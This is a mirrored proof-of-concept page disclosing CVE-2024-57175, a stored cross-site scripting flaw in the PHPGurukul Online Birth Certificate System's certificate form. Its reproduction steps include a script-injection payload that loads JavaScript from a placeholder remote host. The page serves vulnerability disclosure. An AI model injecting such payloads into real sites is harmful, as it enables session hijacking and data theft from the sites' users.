CVE-2024-57175 PoC — PHPGurukul Online Birth Certificate System 安全漏洞

Source

https://github.com/Ajmal101/CVE-2024-57175

Associated Vulnerability

Title:PHPGurukul Online Birth Certificate System 安全漏洞 (CVE-2024-57175)
Description:PHPGurukul Online Birth Certificate System是PHPGurukul公司的一个在线出生证明系统。 PHPGurukul Online Birth Certificate System v1.0版本存在安全漏洞，该漏洞源于容易受到存储型跨站脚本攻击。

Readme

CVE-2024-57175: Stored Cross-Site Scripting (XSS) in PHPGURUKUL Online Birth Certificate System v1.0  

### Description  
A stored Cross-Site Scripting (XSS) vulnerability was identified in PHPGURUKUL Online Birth Certificate System v1.0 in the /user/certificate-form.php page. This vulnerability allows authenticated users to inject malicious XSS scripts into the profile name field, which can lead to code execution on the client side.  

### Steps to Reproduce (PoC)  
1. Navigate to the vulnerable URL as an authenticated user: /user/certificate-form.php.  
2. Modify the profile name with an XSS payload, for example:  
   html
   "><script src="https://severurl"></script>
     

### Impact  
Successful exploitation may allow attackers to execute arbitrary JavaScript on the client side, potentially leading to data theft, session hijacking, or other malicious actions.  

### Credits  
Discovered by Ajmal, January 2025.


###referance
https://github.com/Ajmal101/CVE-2024-57175.git

File Snapshot


 [4.0K]  /data/pocs/7f903e3aed3aa128f6a64bc671ba4fcb68e8150a
└── [ 991]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!